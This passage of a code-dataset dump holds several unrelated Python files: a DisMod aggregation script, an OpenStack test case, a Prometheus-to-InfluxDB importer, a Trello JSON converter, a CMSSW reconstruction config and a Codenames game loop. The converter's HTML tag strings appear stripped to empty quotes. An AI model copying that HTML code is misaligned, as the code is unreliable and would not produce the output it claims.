'draws')\n agg_args['input_file_pattern'] = '{location_id}_{year_id}_{sex_id}.h5'\n agg_args['modelable_entity_id'] = mvm.modelable_entity_id.iat[0]\n agg_args['description'] = mvm.description.iat[0]\n agg_args['year_id'] = demo.year_ids\n agg_args['sex_id'] = demo.sex_ids\n agg_args['measure_id'] = get_measures_from_casc(casc)\n agg_args['db_env'] = db_env\n agg_args['gbd_round_id'] = demo.gbd_round_id\n agg_args['birth_prevalence'] = mvm.birth_prev.fillna(0).replace(\n {0: False, 1: True}).iat[0]\n agg_args['decomp_step'] = mvm.decomp_step.iat[0]\n\n return agg_args\n\n\ndef get_measures_from_casc(casc):\n measure_only = casc.model_version_meta.measure_only\n if measure_only.notnull().all():\n return measure_only.iat[0]\n\n q = \"select measure_id from shared.measure where measure in ('{}')\".format(\n \"', '\".join(importer.integrand_pred))\n df = query(q, conn_def=\"epi\")\n return sorted(df.measure_id.tolist())\n\n\ndef clean_model_directory(outdir, gbd_round_id, decomp_step):\n '''Removes past 
(maybe corrupt) .h5 aggregate files and summary directory\n for a given varnish job run.\n Args:\n outdir (str): full output directory of a cascade model\n gbd_round_id (int): gbd_round_id for which to get location metadata\n '''\n draw_path = os.path.join(outdir, 'draws')\n # remove summary file\n if os.path.exists(os.path.join(draw_path, 'summaries')):\n shutil.rmtree(os.path.join(draw_path, 'summaries'))\n # remove aggregated draw files\n files_to_remove = get_files_to_remove(\n os.listdir(draw_path), gbd_round_id, decomp_step)\n for file in files_to_remove:\n os.remove(os.path.join(draw_path, file))\n\n\ndef get_files_to_remove(dir_list, gbd_round_id, decomp_step):\n '''\n To make varnish.py idempotent, find aggregate location files to delete\n '''\n loc_df = get_location_metadata(\n location_set_id=35,\n gbd_round_id=gbd_round_id,\n decomp_step=decomp_step)\n locs = loc_df.loc[loc_df.most_detailed != 1].location_id.tolist()\n location_substr = \"|\".join([str(l) for l in locs])\n regex = f\"({location_substr})_.*.h5$\"\n files_to_remove = [f for f in dir_list if re.match(regex, f)]\n return files_to_remove\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"gbd_2019/shared_code/central_comp/nonfatal/dismod/varnish.py","file_name":"varnish.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"96449451","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\n\nfrom neutron_lib import constants as n_constants\nfrom neutron_lib.plugins import constants\nimport six\n\nfrom gbpservice.neutron.extensions import group_policy as gp\nfrom gbpservice.neutron.extensions import group_policy_mapping as gpm\nfrom gbpservice.neutron.tests.unit import common as cm\nfrom gbpservice.neutron.tests.unit import test_extension_group_policy as tgp\n\n\nclass GroupPolicyMappingExtTestCase(tgp.GroupPolicyExtensionTestCase):\n def setUp(self):\n self._saved_gp_attr_map = {}\n for k, v in six.iteritems(gp.RESOURCE_ATTRIBUTE_MAP):\n self._saved_gp_attr_map[k] = v.copy()\n self.addCleanup(self._restore_gp_attr_map)\n\n super(tgp.GroupPolicyExtensionTestCase, self).setUp()\n\n attr_map = gp.RESOURCE_ATTRIBUTE_MAP\n attr_map[gp.POLICY_TARGETS].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.POLICY_TARGETS])\n attr_map[gp.POLICY_TARGET_GROUPS].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.POLICY_TARGET_GROUPS])\n attr_map[gp.L2_POLICIES].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.L2_POLICIES])\n attr_map[gp.L3_POLICIES].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.L3_POLICIES])\n attr_map[gp.EXTERNAL_SEGMENTS].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.EXTERNAL_SEGMENTS])\n plural_mappings = {'l2_policy': 'l2_policies',\n 'l3_policy': 'l3_policies',\n 'network_service_policy':\n 'network_service_policies',\n 'external_policy':\n 'external_policies'}\n self.setup_extension(\n tgp.GP_PLUGIN_BASE_NAME, constants.GROUP_POLICY,\n gp.Group_policy, tgp.GROUPPOLICY_URI,\n plural_mappings=plural_mappings)\n self.instance = self.plugin.return_value\n\n def _restore_gp_attr_map(self):\n gp.RESOURCE_ATTRIBUTE_MAP = self._saved_gp_attr_map\n\n def get_create_policy_target_default_attrs(self):\n attrs = cm.get_create_policy_target_default_attrs()\n attrs.update({'port_id': None})\n return attrs\n\n def get_create_policy_target_default_attrs_and_prj_id(self):\n attrs = cm.get_create_policy_target_default_attrs_and_prj_id()\n attrs.update({'port_id': None})\n return attrs\n\n def get_create_policy_target_attrs(self):\n attrs = cm.get_create_policy_target_attrs()\n attrs.update({'port_id': tgp._uuid()})\n fixed_ips = [{'subnet_id': '00000000-ffff-ffff-ffff-000000000000',\n 'ip_address': '11.1.1.1'}]\n attrs.update({'fixed_ips': fixed_ips})\n return attrs\n\n def get_update_policy_target_attrs(self):\n attrs = cm.get_update_policy_target_attrs()\n fixed_ips = [{'subnet_id': '00000000-ffff-ffff-ffff-000000000000',\n 'ip_address': '11.1.1.1'}]\n attrs.update({'fixed_ips': fixed_ips})\n return attrs\n\n def get_create_policy_target_group_default_attrs(self):\n attrs = cm.get_create_policy_target_group_default_attrs()\n attrs.update({'subnets': []})\n return attrs\n\n def get_create_policy_target_group_default_attrs_and_prj_id(self):\n attrs = cm.get_create_policy_target_group_default_attrs_and_prj_id()\n attrs.update({'subnets': []})\n return attrs\n\n def get_create_policy_target_group_attrs(self):\n attrs = cm.get_create_policy_target_group_attrs()\n attrs.update({'subnets': [tgp._uuid()]})\n return attrs\n\n def get_update_policy_target_group_attrs(self):\n attrs = cm.get_update_policy_target_group_attrs()\n attrs.update({'subnets': [tgp._uuid()]})\n return attrs\n\n def get_create_l2_policy_default_attrs(self):\n attrs = cm.get_create_l2_policy_default_attrs()\n attrs.update({'network_id': None})\n return attrs\n\n def get_create_l2_policy_default_attrs_and_prj_id(self):\n attrs = 
cm.get_create_l2_policy_default_attrs_and_prj_id()\n attrs.update({'network_id': None})\n return attrs\n\n def get_create_l2_policy_attrs(self):\n attrs = cm.get_create_l2_policy_attrs()\n attrs.update({'network_id': tgp._uuid()})\n return attrs\n\n def get_create_l3_policy_default_attrs(self):\n attrs = cm.get_create_l3_policy_default_attrs()\n attrs.update({'address_scope_v4_id': None})\n attrs.update({'address_scope_v6_id': None})\n attrs.update({'subnetpools_v4': []})\n attrs.update({'subnetpools_v6': []})\n attrs.update({'routers': []})\n return attrs\n\n def get_create_l3_policy_default_attrs_and_prj_id(self):\n attrs = cm.get_create_l3_policy_default_attrs_and_prj_id()\n attrs.update({'address_scope_v4_id': None})\n attrs.update({'address_scope_v6_id': None})\n attrs.update({'subnetpools_v4': []})\n attrs.update({'subnetpools_v6': []})\n attrs.update({'routers': []})\n return attrs\n\n def get_create_l3_policy_attrs(self):\n attrs = cm.get_create_l3_policy_attrs()\n attrs.update({'address_scope_v4_id': tgp._uuid()})\n attrs.update({'address_scope_v6_id': tgp._uuid()})\n attrs.update({'subnetpools_v4': [tgp._uuid(), tgp._uuid()]})\n attrs.update({'subnetpools_v6': [tgp._uuid(), tgp._uuid()]})\n attrs.update({'routers': [tgp._uuid(), tgp._uuid()]})\n return attrs\n\n def get_update_l3_policy_attrs(self):\n attrs = cm.get_update_l3_policy_attrs()\n attrs.update({'subnetpools_v4': [tgp._uuid(), tgp._uuid()]})\n attrs.update({'subnetpools_v6': [tgp._uuid(), tgp._uuid()]})\n attrs.update({'routers': [tgp._uuid(), tgp._uuid()]})\n return attrs\n\n def get_create_external_segment_default_attrs(self):\n attrs = cm.get_create_external_segment_default_attrs()\n attrs.update({'subnet_id': None})\n return attrs\n\n def get_create_external_segment_default_attrs_and_prj_id(self):\n attrs = cm.get_create_external_segment_default_attrs_and_prj_id()\n attrs.update({'subnet_id': None})\n return attrs\n\n def get_create_external_segment_attrs(self):\n attrs = cm.get_create_external_segment_attrs()\n attrs.update({'subnet_id': tgp._uuid()})\n return attrs\n\n def test_create_policy_target_with_defaults(self):\n policy_target_id = tgp._uuid()\n data = {'policy_target': {'policy_target_group_id': tgp._uuid(),\n 'tenant_id': tgp._uuid()}}\n default_attrs = (\n self.get_create_policy_target_default_attrs_and_prj_id())\n default_data = copy.copy(data)\n default_data['policy_target'].update(default_attrs)\n expected_value = dict(default_data['policy_target'])\n expected_value['id'] = policy_target_id\n expected_value['fixed_ips'] = n_constants.ATTR_NOT_SPECIFIED\n\n self._test_create_policy_target(data, expected_value, default_data)\n","sub_path":"gbpservice/neutron/tests/unit/test_extension_group_policy_mapping.py","file_name":"test_extension_group_policy_mapping.py","file_ext":"py","file_size_in_byte":7520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"476706339","text":"# -*- coding: utf-8 -*-\n# Re-import dumped Prometheus metric data (in plain or compressed\n# JSON format) to a local influxdb instance.\n# Imported data will be put into a dedicated (or specified) database\n# for futher analysis.\n\nimport datetime\nimport influxdb\nimport json\nimport logging\nimport os\nimport random\nimport string\nimport zlib\n\nfrom utils import fileopt\nfrom utils import util\n\n\nclass PromDump():\n def __init__(self, args):\n # if db_name, else db_name = prom_dump_`date`\n self.host = args.host if args.host else 'localhost'\n self.port = args.port if 
args.port else 8086\n self.datadir = args.dir if args.dir else 'data'\n self.db_name = args.db if args.db else self.unique_dbname()\n self.user = args.user\n self.passwd = args.passwd\n\n # unique_dbname() generates a unique database name for importing, to prevents\n # overwritting of previous imported data\n def unique_dbname(self):\n dbname = []\n # universal prefix\n dbname.append('tidb_insight_prom')\n # current time\n dbname.append(datetime.datetime.now().strftime(\"%Y%m%d%H%M\"))\n # a 4 digits random string\n dbname.append(''.join(random.choice(\n string.ascii_lowercase + string.digits) for _ in range(4)))\n\n return '_'.join(dbname)\n\n def load_dump(self):\n def file_list(dir=None):\n f_list = []\n for file in fileopt.list_dir(dir):\n if os.path.isdir(file):\n f_list += file_list(file)\n else:\n f_list.append(file)\n return f_list\n\n for file in file_list(self.datadir):\n if file.endswith('.json'):\n raw = fileopt.read_file(file)\n elif file.endswith('.dat'):\n raw = zlib.decompress(fileopt.read_file(file, 'rb'))\n else:\n logging.debug(\"Skipped unrecorgnized file '%s'\" % file)\n continue\n yield json.loads(raw)\n\n def build_series(self):\n def format_prom_metric(key=None):\n points = []\n point = {'fields': {}}\n # build point header\n for metric in key:\n point['measurement'] = metric['metric']['__name__']\n point['tags'] = {\n 'cluster': self.db_name,\n 'monitor': 'prometheus',\n }\n for k, v in metric['metric'].items():\n point['tags'][k] = v\n # build point values\n for value in metric['values']:\n point['time'] = datetime.datetime.utcfromtimestamp(\n value[0]).strftime('%Y-%m-%dT%H:%M:%SZ')\n try:\n point['fields']['value'] = float(value[1])\n except ValueError:\n point['fields']['value'] = value[1]\n points.append(point.copy())\n return points\n\n for key in self.load_dump():\n yield format_prom_metric(key)\n\n def write2influxdb(self):\n client = influxdb.InfluxDBClient(\n host=self.host, port=self.port, username=self.user, password=self.passwd,\n database=self.db_name, timeout=30)\n # create_database has no effect if the database already exist\n client.create_database(self.db_name)\n logging.info(\"Metrics will be imported to database '%s'.\" %\n self.db_name)\n\n for series in self.build_series():\n try:\n client.write_points(series, batch_size=2000)\n except influxdb.exceptions.InfluxDBClientError as e:\n logging.warn(\n \"Write error for key '%s', data may be empty.\" % series[0]['measurement'])\n logging.debug(e)\n\n def run_importing(self):\n self.write2influxdb()\n","sub_path":"metric/importer/prometheus.py","file_name":"prometheus.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"136130721","text":"#!/usr/bin/env python\r\n\r\nfrom __future__ import print_function\r\nimport os\r\nimport sys\r\nimport json\r\nimport argparse\r\n\r\n\r\nclass Print:\r\n @staticmethod\r\n def stdout(*args, **kwargs):\r\n print(*args, **kwargs)\r\n\r\n @staticmethod\r\n def stderr(*args, **kwargs):\r\n print(*args, file=sys.stderr, **kwargs)\r\n\r\n\r\nclass App:\r\n def __init__(self, json_path):\r\n \"\"\"\r\n :type json_path: str\r\n \"\"\"\r\n self._json_path = json_path\r\n\r\n self._is_csv_output = True\r\n self._is_html_output = False\r\n\r\n self._is_column_view = True\r\n self._is_list_view = False\r\n\r\n self._csv_delimiter = ','\r\n\r\n def set_format(self, output):\r\n \"\"\"\r\n :type output: str\r\n \"\"\"\r\n self._is_csv_output = False\r\n self._is_html_output = 
False\r\n\r\n if output == 'csv':\r\n self._is_csv_output = True\r\n elif output == 'html':\r\n self._is_html_output = True\r\n else:\r\n self._is_csv_output = True\r\n\r\n def set_view(self, view):\r\n \"\"\"\r\n :type view: str\r\n \"\"\"\r\n self._is_column_view = False\r\n self._is_list_view = False\r\n\r\n if view == 'column':\r\n self._is_column_view = True\r\n elif view == 'list':\r\n self._is_list_view = True\r\n else:\r\n self._is_column_view = True\r\n\r\n def set_csv_delimiter(self, csv_delimiter):\r\n \"\"\"\r\n :type csv_delimiter: str\r\n \"\"\"\r\n self._csv_delimiter = csv_delimiter\r\n\r\n def validate_trello_json(self, json_data):\r\n \"\"\"\r\n :type json_data: dict\r\n :returns: return 0 if validate was success.\r\n :rtype: int\r\n \"\"\"\r\n if 'lists' not in json_data or len(json_data['lists']) == 0:\r\n Print.stderr('JSON data is not valid: lists is empty')\r\n return 1\r\n\r\n for one_list in json_data['lists']: # type: dict\r\n if 'name' not in one_list or 'id' not in one_list:\r\n Print.stderr('JSON data is not valid: list name or id is empty')\r\n return 1\r\n\r\n if 'cards' not in json_data or len(json_data['cards']) == 0:\r\n Print.stderr('JSON data is not valid: cards is empty')\r\n return 1\r\n\r\n for one_card in json_data['cards']: # type: dict\r\n if 'name' not in one_card or 'idList' not in one_card:\r\n Print.stderr('JSON data is not valid: card name or idList is empty')\r\n return 1\r\n return 0\r\n\r\n def _get_row_cards_list(self, json_data):\r\n \"\"\"\r\n :type json_data: dict\r\n :returns: return list (of str) of cards (one row) for column view.\r\n :rtype: list\r\n \"\"\"\r\n cells_list = list()\r\n is_empty = True\r\n for one_list in json_data['lists']: # type: dict\r\n index = 0\r\n card_name = ''\r\n for one_card in json_data['cards']: # type: dict\r\n if one_list['id'] == one_card['idList']:\r\n one_card = json_data['cards'].pop(index)\r\n card_name = one_card['name'].replace('\"', '')\r\n is_empty = False\r\n break\r\n else:\r\n index += 1\r\n cells_list.append(card_name)\r\n\r\n if is_empty:\r\n cells_list = list()\r\n return cells_list\r\n\r\n def _get_cards_list_by_id(self, json_data, list_id):\r\n \"\"\"\r\n :type json_data: dict\r\n :type list_id: str\r\n :returns: return list (of dict) of all cards by selected parent id\r\n :rtype: list\r\n \"\"\"\r\n cards_list = list()\r\n index = 0\r\n while index < len(json_data['cards']):\r\n if list_id == json_data['cards'][index]['idList']:\r\n cards_list.append(json_data['cards'].pop(index))\r\n else:\r\n index += 1\r\n return cards_list\r\n\r\n def _get_card_checklist_by_id(self, json_data, card_id):\r\n \"\"\"\r\n :type json_data: dict\r\n :type card_id: str\r\n :returns: return list (of dict) of card checklist\r\n :rtype: list\r\n \"\"\"\r\n check_list = list()\r\n index = 0\r\n while index < len(json_data['checklists']):\r\n if card_id == json_data['checklists'][index]['idCard']:\r\n check_list.append(json_data['checklists'].pop(index))\r\n else:\r\n index += 1\r\n return check_list\r\n\r\n def _generate_printed_row(self, cells_list):\r\n \"\"\"\r\n :type cells_list: list\r\n :returns: return line to print.\r\n :rtype: str\r\n \"\"\"\r\n printed_row = ''\r\n for one_cell in cells_list: # type: str\r\n if self._is_csv_output:\r\n one_cell = '\"' + one_cell + '\"'\r\n if not printed_row:\r\n printed_row = one_cell\r\n else:\r\n printed_row = printed_row + self._csv_delimiter + one_cell\r\n elif self._is_html_output:\r\n one_cell = '' + one_cell + ''\r\n printed_row = printed_row + 
one_cell\r\n\r\n if self._is_html_output:\r\n printed_row = '' + printed_row + ''\r\n return printed_row\r\n\r\n def print_column_view(self, json_data):\r\n cells_list = list()\r\n for one_list in json_data['lists']: # type: dict\r\n list_name = one_list['name'].replace('\"', '')\r\n if self._is_html_output:\r\n cells_list.append('' + list_name + '')\r\n else:\r\n cells_list.append(list_name)\r\n printed_row = self._generate_printed_row(cells_list)\r\n\r\n if self._is_html_output:\r\n self._print_html_style()\r\n Print.stdout('')\r\n Print.stdout(printed_row.encode('UTF-8'))\r\n\r\n while json_data['cards']:\r\n cells_list = self._get_row_cards_list(json_data)\r\n if cells_list:\r\n printed_row = self._generate_printed_row(cells_list)\r\n Print.stdout(printed_row.encode('UTF-8'))\r\n\r\n if self._is_html_output:\r\n Print.stdout('
    ')\r\n\r\n def print_list_view(self, json_data):\r\n # Two column in this view. First is card name, second is card checkitems\r\n if self._is_html_output:\r\n self._print_html_style()\r\n Print.stdout('')\r\n\r\n for one_list in json_data['lists']: # type: dict\r\n cells_list = list()\r\n\r\n list_name = one_list['name'].replace('\"', '')\r\n if self._is_html_output:\r\n cells_list.append('' + list_name + '')\r\n else:\r\n cells_list.append(list_name)\r\n cells_list.append('') # second empty column\r\n printed_row = self._generate_printed_row(cells_list)\r\n Print.stdout(printed_row.encode('UTF-8'))\r\n\r\n cards_list = self._get_cards_list_by_id(json_data, one_list['id'])\r\n for one_card in cards_list: # type: dict\r\n check_list = self._get_card_checklist_by_id(json_data, one_card['id'])\r\n check_str = ''\r\n for one_check in check_list: # type: dict\r\n for one_check_item in one_check['checkItems']: # type: dict\r\n check_item_name = one_check_item['name'].replace('\"', '')\r\n if not check_str:\r\n check_str = check_item_name\r\n else:\r\n check_str = check_str + ', ' + check_item_name\r\n\r\n cells_list = list()\r\n card_name = one_card['name'].replace('\"', '')\r\n cells_list.append(card_name)\r\n cells_list.append(check_str)\r\n printed_row = self._generate_printed_row(cells_list)\r\n Print.stdout(printed_row.encode('UTF-8'))\r\n\r\n if self._is_html_output:\r\n Print.stdout('
')\r\n\r\n def _print_html_style(self):\r\n Print.stdout('')\r\n Print.stdout('')\r\n Print.stdout('')\r\n Print.stdout('')\r\n Print.stdout('')\r\n\r\n def main(self):\r\n if not os.path.isfile(self._json_path):\r\n Print.stderr('Can\\'t read JSON file (' + self._json_path + ')')\r\n return 1\r\n\r\n json_data = dict()\r\n with open(self._json_path, 'r') as json_file:\r\n try:\r\n json_data = json.load(json_file)\r\n except ValueError:\r\n pass\r\n\r\n if not json_data:\r\n Print.stderr('JSON file is incorrect (' + self._json_path + ')')\r\n return 1\r\n\r\n if self.validate_trello_json(json_data) != 0:\r\n return 1\r\n\r\n if self._is_column_view:\r\n self.print_column_view(json_data)\r\n return 0\r\n if self._is_list_view:\r\n self.print_list_view(json_data)\r\n return 0\r\n return 1\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-o',\r\n '--output',\r\n choices=['csv', 'html'],\r\n dest='output',\r\n help='generate csv or html from json')\r\n parser.add_argument('-v',\r\n '--view',\r\n choices=['column', 'list'],\r\n dest='view',\r\n help='generate column or list view')\r\n parser.add_argument('-d',\r\n '--delimiter',\r\n metavar='',\r\n dest='delimiter',\r\n action=\"store\",\r\n help='set csv delimiter',\r\n default=',')\r\n parser.add_argument(dest='path',\r\n metavar='',\r\n type=str,\r\n help='set json file path')\r\n args = parser.parse_args()\r\n\r\n args.delimiter = args.delimiter.strip()\r\n if len(args.delimiter) != 1:\r\n Print.stderr('Incorrect delimiter')\r\n sys.exit(1)\r\n\r\n app = App(args.path)\r\n\r\n app.set_format(args.output)\r\n app.set_view(args.view)\r\n app.set_csv_delimiter(args.delimiter)\r\n\r\n res = app.main()\r\n sys.exit(res)\r\n","sub_path":"tb_converter.py","file_name":"tb_converter.py","file_ext":"py","file_size_in_byte":10699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"586957733","text":"# \n# run reco\n#\n\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\noptions = VarParsing ('analysis')\noptions.parseArguments()\n\n# standard CMSSW configuration import; required before cms.Process and cms.untracked are used below\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process('PulseTree')\n\n# import of standard configurations\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(options.maxEvents)\n)\n\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(10)\n\n#process.TFileService = cms.Service(\"TFileService\",\n #fileName = cms.string(options.outputFile)\n#)\n\nprocess.options = cms.untracked.PSet(\n# SkipEvent = cms.untracked.vstring('ProductNotFound'),\n)\n\n# Production Info\nprocess.configurationMetadata = cms.untracked.PSet(\n annotation = cms.untracked.string('reco nevts:1'),\n name = cms.untracked.string('Applications'),\n version = cms.untracked.string('$Revision: 1.19 $')\n)\n\n# Other statements\nfrom Configuration.AlCa.GlobalTag import GlobalTag\n#process.GlobalTag = GlobalTag(process.GlobalTag, '80X_dataRun2_Prompt_v12', '')\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 
'102X_upgrade2018_realistic_v12', '')\n#102X_upgrade2018_realistic_v12\n\nimport EventFilter.EcalRawToDigi.EcalUnpackerData_cfi\nprocess.ecalDigis = EventFilter.EcalRawToDigi.EcalUnpackerData_cfi.ecalEBunpacker.clone()\nprocess.ecalDigis.DoRegional = False\n\nprocess.ecalDigis.silentMode = False\n\n\n\nmake_collections = ['digis']\nmake_collections.append('rechits')\n\n\nuse_raw_dat = True\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(50)\n\n# -> this was for local runs\n# process.source = cms.Source(\"NewEventStreamFileReader\", fileNames = cms.untracked.vstring(options.inputFiles))\n\n# -> this is the standard one\nprocess.source = cms.Source(\"PoolSource\", fileNames = cms.untracked.vstring(options.inputFiles) )\n\n\n\nprocess.load('RecoLocalCalo.EcalRecProducers.ecalUncalibRecHit_cfi')\nprocess.load('RecoLocalCalo.EcalRecProducers.ecalMultiFitUncalibRecHit_cfi')\nprocess.ecalUncalibRecHit.EBdigiCollection = cms.InputTag(\"ecalDigis\",\"ebDigis\")\nprocess.ecalUncalibRecHit.EEdigiCollection = cms.InputTag(\"ecalDigis\",\"eeDigis\")\nprocess.ecalMultiFitUncalibRecHit.EBdigiCollection = cms.InputTag(\"ecalDigis\",\"ebDigis\")\nprocess.ecalMultiFitUncalibRecHit.EEdigiCollection = cms.InputTag(\"ecalDigis\",\"eeDigis\")\nprocess.ecalMultiFitUncalibRecHit.algoPSet.useLumiInfoRunHeader = cms.bool(False)\n\nprocess.ecalDigis_step = cms.Path(process.ecalDigis)\nprocess.multifit = cms.Path(process.ecalMultiFitUncalibRecHit)\nprocess.weights = cms.Path(process.ecalUncalibRecHit)\n\n\nprocess.RECOSIMoutput = cms.OutputModule(\"PoolOutputModule\",\n dataset = cms.untracked.PSet(\n dataTier = cms.untracked.string(''),\n filterName = cms.untracked.string('')\n ),\n eventAutoFlushCompressedSize = cms.untracked.int32(5242880),\n #fileName = cms.untracked.string('reco_RECO.root'),\n fileName = cms.untracked.string(options.outputFile),\n outputCommands = cms.untracked.vstring(\"keep *\"),\n splitLevel = cms.untracked.int32(0)\n)\n\n\nprocess.endjob_step = cms.EndPath(process.RECOSIMoutput)\n\n#process.schedule = cms.Schedule(process.ecalDigis_step, process.endjob_step)\nprocess.schedule = cms.Schedule(process.ecalDigis_step,process.multifit,process.weights,process.endjob_step)\n\n\n\n","sub_path":"test/reco.py","file_name":"reco.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"323674091","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 4 14:28:56 2019\n\n@author: callu\n\"\"\"\ndef turn(team):\n if (team==0):\n print(\"IT IS YOUR TURN, TEAM RED\\n\")\n num = int(input(\"RED SPYMASTER, how many words are you connecting? \"))\n clue = input(\"RED SPYMASTER, what is your clue?\")\n return (num,clue)\n else:\n print(\"IT IS YOUR TURN, TEAM BLUE\\n\")\n num = int(input(\"BLUE SPYMASTER, how many words are you connecting? \"))\n clue = input(\"BLUE SPYMASTER, what is your clue? 
\")\n return (num,clue)\n \ndef checkGuess(team, guess, redwords, bluewords, bywords, assassin):\n ass = False\n wrong = False\n if team == 0:\n if (guess.lower()==\"endturn\"):\n print(\"You have ended your turn, RED TEAM\")\n return ass, wrong\n try:\n redwords.index(guess.lower())\n print(\"CORRECT, that was one of your team's words\")\n redwords.remove(guess.lower())\n except:\n if (assassin==guess):\n actual=\"THE ASSASSIN\"\n ass=True\n else:\n try:\n bluewords.index(guess.lower())\n actual=\"one of the BLUE TEAM'S WORDS\"\n bluewords.remove(guess.lower())\n wrong = True\n except:\n try:\n bywords.index(guess.lower())\n actual=\"one of the BYSTANDERS\"\n bywords.remove(guess.lower())\n wrong = True\n except:\n print(\"ERROR\")\n actual = \"ERROR\"\n print(\"INCORRECT, \"+guess+\" was \"+actual)\n return ass, wrong\n else:\n if (guess.lower()==\"endturn\"):\n print(\"You have ended your turn, BLUE TEAM\")\n return ass, wrong\n try:\n bluewords.index(guess.lower())\n print(\"CORRECT, that was one of your team's words\")\n bluewords.remove(guess.lower())\n except:\n if (assassin==guess):\n actual=\"THE ASSASSIN\"\n ass=True\n else:\n try:\n redwords.index(guess.lower())\n actual=\"one of the RED TEAM'S WORDS\"\n redwords.remove(guess.lower())\n wrong = True\n except:\n try:\n bywords.index(guess.lower())\n actual=\"one of the BYSTANDERS\"\n bywords.remove(guess.lower())\n wrong = True\n except:\n print(\"ERROR\")\n actual = \"ERROR\"\n print(\"INCORRECT, \"+guess+\" was \"+actual)\n return ass, wrong\n return ass, wrong\n \ndef win(team):\n if (team==1):\n print(\"BLUE TEAM WINS!!!!\")\n else:\n print(\"RED TEAM WINS!!!!\")\n again = input(\"PLAY AGAIN? Y/N: \")\n if (again.lower()==\"y\"):\n print(\"Setting up another game!\")\n print(\"========================\\n\")\n return True\n else:\n print(\"Thanks for playing!\")\n return False","sub_path":"gameLoopAIPlayer.py","file_name":"gameLoopAIPlayer.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"387645601","text":"\"\"\"\nContains functions used in the ``game.py`` file of a project.\n\"\"\"\n\nimport sys\nfrom os.path import join\nfrom operator import attrgetter\nfrom time import time\n\nimport pygame\nfrom pygame.locals import *\n\nfrom gamebaker import classes, constants\n\n\ndef get_events(blueprints):\n \"\"\"\n Return a set of all the events that have been defined in any ``Blueprint``, and a set of all the doubletap events.\n \n Events that haven't been defined will not be called to save time.\n ``blueprints`` should be the module containing the game's blueprints.\n \"\"\"\n events = set()\n for variable in vars(blueprints).values():\n try:\n if issubclass(variable, blueprints.Blueprint) and variable != blueprints.Blueprint: \n for key, value in vars(variable).items():\n if callable(value):\n events.add(key)\n except TypeError:\n continue\n return (events & classes.events, events & classes.doubletap_events)\n\ndef load_level(level_list, number):\n \"\"\"\n Load a level given a list of ``Level`` objects and an index, and return a tuple of the views and objects of that level.\n \"\"\"\n views = list(level_list[number].views)\n objects = list(level_list[number].objects)\n scenery = list(level_list[number].scenery)\n level = level_list[number]\n objects.sort(key=attrgetter(\"draw_depth\"))\n scenery.sort(key=attrgetter(\"draw_depth\"))\n \n return (views, objects, scenery, level)\n \ndef draw_objects(objects, views, window):\n 
\"\"\"\n Draw objects to views, and those views to a window.\n \"\"\"\n window.fill((0, 0, 0))\n for v in views:\n v.surface.fill((0, 0, 0))\n for a in objects:\n v.surface.blit(a.sprite.image, (a.x - v.x, a.y - v.y))\n window.blit(v.surface, (v.screen_x, v.screen_y))\n \n \nclass EventContainer:\n \"\"\"\n Represent an event and data pertaining to it.\n \"\"\"\n def _attrs(self):\n \"\"\"\n Returns a tuple containing the attributes of an instance used for hashing and equality checking.\n Should be overridden by subclasses.\n \"\"\"\n return ()\n \n def __eq__(self, other):\n return type(self) == type(other) and all(a == b for a, b in zip(self._attrs(), other._attrs()))\n\n def __hash__(self):\n return hash(self._attrs())\n\nclass KeyEventWithoutData(EventContainer):\n def __init__(self, name):\n self.name = name\n \n def _attrs(self):\n return (self.name,)\n \n def __repr__(self):\n return \"KeyEventWithoutData({})\".format(repr(self.name))\n \nclass KeyEventWithData(EventContainer):\n def __init__(self, name, data):\n self.name = name\n self.data = data\n \n def _attrs(self):\n return (self.name, self.data)\n \n def __repr__(self):\n return \"KeyEventAndData({}, {})\".format(repr(self.name), repr(self.data))\n \nclass DoubleTapEvent(EventContainer):\n def __init__(self, key_event, time):\n self.key_event = key_event\n self.time = time\n\n def _attrs(self):\n return (self.key_event, self.time)\n \n def __repr__(self):\n return \"DoubleTapEvent({}, {})\".format(repr(self.key_event), repr(self.time))\n\ndef try_event(instance, event, *args, **kwargs):\n \"\"\"\n Check if an instance as a method defined 